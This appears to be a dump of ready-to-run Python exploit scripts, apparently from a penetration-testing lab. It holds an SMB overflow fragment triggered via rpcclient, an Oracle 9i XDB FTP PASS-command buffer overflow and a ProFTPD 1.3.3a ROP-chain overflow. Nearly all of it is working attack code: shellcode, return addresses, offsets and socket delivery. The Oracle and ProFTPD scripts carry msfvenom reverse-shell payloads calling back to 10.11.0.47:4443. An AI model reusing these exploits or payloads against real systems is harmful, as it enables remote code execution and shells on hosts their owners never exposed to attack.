 60 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
 61 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
 62 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
 63 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
 64 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
 65 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
 66 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
 67 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
 68 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
 69 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
 70 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
 71 | "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
 72 | "\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0b\x00\x2f\x68"
 73 | "\x02\x00\x11\x5f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
 74 | "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
 75 | "\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
 76 | "\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
 77 | "\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
 78 | "\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
 79 | "\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6"
 80 | "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
 81 | "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
 82 | 
 83 | host = target, 445
 84 | 
 85 | buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42"
 86 | buff+="\x72\x00\x00\x00\x00\x18\x53\xc8"
 87 | buff+="\x17\x02" #high process ID
 88 | buff+="\x00\xe9\x58\x01\x00\x00"
 89 | buff+="\x00\x00\x00\x00\x00\x00\x00\x00"
 90 | buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02"
 91 | buff+="\x04\x0d\xdf\xff"*25
 92 | buff+="\x00\x02\x53\x4d"
 93 | buff+="\x42\x20\x32\x2e\x30\x30\x32\x00"
 94 | buff+="\x00\x00\x00\x00"*37
 95 | buff+="\xff\xff\xff\xff"*2
 96 | buff+="\x42\x42\x42\x42"*7
 97 | buff+="\xb4\xff\xff\x3f" #magic index
 98 | buff+="\x41\x41\x41\x41"*6
 99 | buff+="\x09\x0d\xd0\xff" #return address
100 | 
101 | #stager_sysenter_hook from metasploit
102 | 
103 | buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01"
104 | buff+="\x00\x00\x59\x0f\x32\x89\x46\x5d"
105 | buff+="\x8b\x7e\x61\x89\xf8\x0f\x30\xb9"
106 | buff+="\x16\x02\x00\x00\xf3\xa4\xfb\xf4"
107 | buff+="\xeb\xfd\xe8\xdd\xff\xff\xff\x6a"
108 | buff+="\x00\x9c\x60\xe8\x00\x00\x00\x00"
109 | buff+="\x58\x8b\x58\x54\x89\x5c\x24\x24"
110 | buff+="\x81\xf9\xde\xc0\xad\xde\x75\x10"
111 | buff+="\x68\x76\x01\x00\x00\x59\x89\xd8"
112 | buff+="\x31\xd2\x0f\x30\x31\xc0\xeb\x31"
113 | buff+="\x8b\x32\x0f\xb6\x1e\x66\x81\xfb"
114 | buff+="\xc3\x00\x75\x25\x8b\x58\x5c\x8d"
115 | buff+="\x5b\x69\x89\x1a\xb8\x01\x00\x00"
116 | buff+="\x80\x0f\xa2\x81\xe2\x00\x00\x10"
117 | buff+="\x00\x74\x0e\xba\x00\xff\x3f\xc0"
118 | buff+="\x83\xc2\x04\x81\x22\xff\xff\xff"
119 | buff+="\x7f\x61\x9d\xc3\xff\xff\xff\xff"
120 | buff+="\x00\x04\xdf\xff\x00\x04\xfe\x7f"
121 | buff+="\x60\x6a\x30\x58\x99\x64\x8b\x18"
122 | buff+="\x39\x53\x0c\x74\x2b\x8b\x43\x10"
123 | buff+="\x8b\x40\x3c\x83\xc0\x28\x8b\x08"
124 | buff+="\x03\x48\x03\x81\xf9\x6c\x61\x73"
125 | buff+="\x73\x75\x15\xe8\x07\x00\x00\x00"
126 | buff+="\xe8\x0d\x00\x00\x00\xeb\x09\xb9"
127 | buff+="\xde\xc0\xad\xde\x89\xe2\x0f\x34"
128 | buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff"
129 | 
130 | #Change this to match your shell
131 | buff+=shell2
132 | 
133 | s = socket()
134 | s.connect(host)
135 | # need to encode as bytes method for use in Python3
136 | s.sendall(buff.encode('utf-8'))
137 | s.close() 
138 | #Trigger the above injected code via authenticated process.
139 | subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)
140 | 


--------------------------------------------------------------------------------
/oracle_9i_xdb_ftp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | ## oracle_9i_xdb_ftp.py
 3 | ##
 4 | ## Name: Oracle 9i XDB FTP PASS Overflow (win32)',
 5 | ## Description:   By passing an overly long string to the PASScommand, a
 6 | ##                stack based buffer overflow occurs. David Litchfield, has
 7 | ##                illustrated multiple vulnerabilities inthe Oracle 9i XML
 8 | ##                Database (XDB), during a seminar on "Variations inexploit
 9 | ##                methods between Linux andWindows" presented at the Blackhat
10 | ##                conference.
11 | ##		
12 | ## Author:  charles.holtzkampf [at] gmail.com
13 | ## WWW:www.bommachine.co.uk
14 | ## Usage: python oracle_9i_xdb_ftp.py <IP Address> <Port> 
15 | 
16 | import sys, socket
17 | 
18 | 
19 | rhost = sys.argv[1] 			## Target IP address as command line argument
20 | rport = int(sys.argv[2])		## Target Port as command line argument
21 | 
22 | 
23 | 
24 | 
25 | ret = "\x46\x6d\x61\x60" 					## oraclient9.dll (pop/pop/ret)
26 | prepend = "\x81\xc4\xff\xef\xff\xff\x44"	## following the NOP sled, but before the decoder machine code
27 | 
28 | 
29 | 
30 | 
31 | ## Max space for shell code = 800
32 | ## Bad characters according to metasploit: \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40
33 | ## Generate payload: msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=4443 EXITFUNC=thread -a x86 --platform Windows  -b \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 -f python -v shellcode
34 | ## Payloads size = 348
35 | 
36 | shellcode =  ""
37 | shellcode += "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
38 | shellcode += "\x81\x76\x0e\x94\x8c\x91\xbd\x83\xee\xfc\xe2\xf4"
39 | shellcode += "\x68\x64\x13\xbd\x94\x8c\xf1\x34\x71\xbd\x51\xd9"
40 | shellcode += "\x1f\xdc\xa1\x36\xc6\x80\x1a\xef\x80\x07\xe3\x95"
41 | shellcode += "\x9b\x3b\xdb\x9b\xa5\x73\x3d\x81\xf5\xf0\x93\x91"
42 | shellcode += "\xb4\x4d\x5e\xb0\x95\x4b\x73\x4f\xc6\xdb\x1a\xef"
43 | shellcode += "\x84\x07\xdb\x81\x1f\xc0\x80\xc5\x77\xc4\x90\x6c"
44 | shellcode += "\xc5\x07\xc8\x9d\x95\x5f\x1a\xf4\x8c\x6f\xab\xf4"
45 | shellcode += "\x1f\xb8\x1a\xbc\x42\xbd\x6e\x11\x55\x43\x9c\xbc"
46 | shellcode += "\x53\xb4\x71\xc8\x62\x8f\xec\x45\xaf\xf1\xb5\xc8"
47 | shellcode += "\x70\xd4\x1a\xe5\xb0\x8d\x42\xdb\x1f\x80\xda\x36"
48 | shellcode += "\xcc\x90\x90\x6e\x1f\x88\x1a\xbc\x44\x05\xd5\x99"
49 | shellcode += "\xb0\xd7\xca\xdc\xcd\xd6\xc0\x42\x74\xd3\xce\xe7"
50 | shellcode += "\x1f\x9e\x7a\x30\xc9\xe4\xa2\x8f\x94\x8c\xf9\xca"
51 | shellcode += "\xe7\xbe\xce\xe9\xfc\xc0\xe6\x9b\x93\x73\x44\x05"
52 | shellcode += "\x04\x8d\x91\xbd\xbd\x48\xc5\xed\xfc\xa5\x11\xd6"
53 | shellcode += "\x94\x73\x44\xed\xc4\xdc\xc1\xfd\xc4\xcc\xc1\xd5"
54 | shellcode += "\x7e\x83\x4e\x5d\x6b\x59\x06\xd7\x91\xe4\x9b\xb6"
55 | shellcode += "\x94\xa3\xf9\xbf\x94\x9d\xca\x34\x72\xe6\x81\xeb"
56 | shellcode += "\xc3\xe4\x08\x18\xe0\xed\x6e\x68\x11\x4c\xe5\xb1"
57 | shellcode += "\x6b\xc2\x99\xc8\x78\xe4\x61\x08\x36\xda\x6e\x68"
58 | shellcode += "\xfc\xef\xfc\xd9\x94\x05\x72\xea\xc3\xdb\xa0\x4b"
59 | shellcode += "\xfe\x9e\xc8\xeb\x76\x71\xf7\x7a\xd0\xa8\xad\xbc"
60 | shellcode += "\x95\x01\xd5\x99\x84\x4a\x91\xf9\xc0\xdc\xc7\xeb"
61 | shellcode += "\xc2\xca\xc7\xf3\xc2\xda\xc2\xeb\xfc\xf5\x5d\x82"
62 | shellcode += "\x12\x73\x44\x34\x74\xc2\xc7\xfb\x6b\xbc\xf9\xb5"
63 | shellcode += "\x13\x91\xf1\x42\x41\x37\x71\xa0\xbe\x86\xf9\x1b"
64 | shellcode += "\x01\x31\x0c\x42\x41\xb0\x97\xc1\x9e\x0c\x6a\x5d"
65 | shellcode += "\xe1\x89\x2a\xfa\x87\xfe\xfe\xd7\x94\xdf\x6e\x68"
66 | 
67 | 
68 | user = "A" * 10 											## Creating random text for user 
69 | passwd = "B" * 442 											## Creating random text for password
70 | jmp_short = "\xEB\x06"										## Short jump (\xEB) to an offset of 6 (\x06) according to metasploit (Rex::Arch::X86.jmp_short(6))		
71 | two_nops  = "\x90\x90"										## Two NOP's as per metasploit 
72 | nops = "\x90" *(800-len(shellcode))							## Create NOP sled to bring NOPs to 800 bytes
73 | 
74 | ## Building the exploit
75 | 
76 | exploit = passwd + jmp_short + two_nops + ret + nops + prepend + shellcode 
77 | 
78 | 
79 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
80 | 
81 | try:
82 | 	print( "\nConnecting...")
83 | 	s.connect((rhost,rport))
84 | 	data = s.recv(1024)
85 | 	user_send = 'USER' + user +'\r\n'
86 | 	s.send(user_send.encode('utf-8'))
87 | 	data = s.recv(1024)
88 | 	pass_send = 'PASS ' + exploit + '\r\n'
89 | 	s.send(pass_send.encode('utf-8'))
90 | 	print("\nDone!")
91 | 	s.close
92 | except:
93 | 	print("Could not connect to " + rhost + ":" + str(rport) + "!")
94 | 
95 | 
96 | 


--------------------------------------------------------------------------------
/protfpd_exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import socket
 3 | import struct
 4 | 
 5 | # msfvenom  -p linux/x86/shell_reverse_tcp LHOST=10.11.0.47 LPORT=4443 -e x86/shikata_ga_nai -b "\x09\x0a\x0b\x0c\x0d\x20\xff" -f c
 6 | # Payload size: 95 bytes
 7 | shellcode = (
 8 | "\xda\xc4\xb8\xd7\x21\x10\x0e\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
 9 | "\x12\x31\x42\x17\x03\x42\x17\x83\x15\x25\xf2\xfb\xa8\xfd\x05"
10 | "\xe0\x99\x42\xb9\x8d\x1f\xcc\xdc\xe2\x79\x03\x9e\x90\xdc\x2b"
11 | "\xa0\x5b\x5e\x02\xa6\x9a\x36\x9f\x53\x5d\xe9\xf7\x61\x5d\xe4"
12 | "\x5c\xef\xbc\xb6\x05\xbf\x6f\xe5\x7a\x3c\x19\xe8\xb0\xc3\x4b"
13 | "\x82\x24\xeb\x18\x3a\xd1\xdc\xf1\xd8\x48\xaa\xed\x4e\xd8\x25"
14 | "\x10\xde\xd5\xf8\x53"
15 | )
16 | 
17 | # Debian 6 - ProFTPD 1.3.3a
18 | ret = struct.pack('<L', 0x805a547) # pop esi / pop ebp / ret
19 | writable = struct.pack('<L', 0x80e81a0) # .data
20 | iaccount = 4096+16
21 | offset = 0x102c-4
22 | buffer = 'SITE ' + shellcode 
23 | oddbyte = "\x41" if (len(buffer) % 2) == 0 else ""
24 | buffer += oddbyte + "\xff"*(iaccount-len(shellcode)) 
25 | padding = "\x41"*(offset-len(buffer))
26 | buffer += padding + ret + writable
27 | buffer += struct.pack('<L', 0xcccccccc) # unused
28 | buffer += struct.pack('<L', 0x805a544) # mov eax,esi / pop ebx / pop esi / pop ebp / ret
29 | buffer += struct.pack('<L', 0xcccccccc) # becomes ebx
30 | buffer += struct.pack('<L', 0xcccccccc) # becomes esi
31 | buffer += struct.pack('<L', 0xcccccccc) # becomes ebp
32 | buffer += struct.pack('<L', 0x8068886) # mov eax,[eax] / ret
33 | buffer += struct.pack('<L', 0x8068886) # mov eax,[eax] / ret
34 | buffer += struct.pack('<L', 0x8068886) # mov eax,[eax] / ret
35 | buffer += struct.pack('<L', 0x8068886) # mov eax,[eax] / ret
36 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
37 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
38 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
39 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
40 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
41 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
42 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
43 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
44 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
45 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
46 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
47 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
48 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
49 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
50 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
51 | buffer += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret
52 | buffer += struct.pack('<L', 0x0805c26c) # jmp eax
53 | buffer += "\r\n"
54 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
55 | 
56 | try:
57 | 	print("Connecting.\n")
58 | 	s.connect(('10.11.1.146', 21))
59 | 	print("Sending buffer.\n")
60 | 	s.send(buffer.encode('utf-8'))
61 | 	print("Done.\n")
62 | except:
63 | 	print("Failed.\n")
64 | 


--------------------------------------------------------------------------------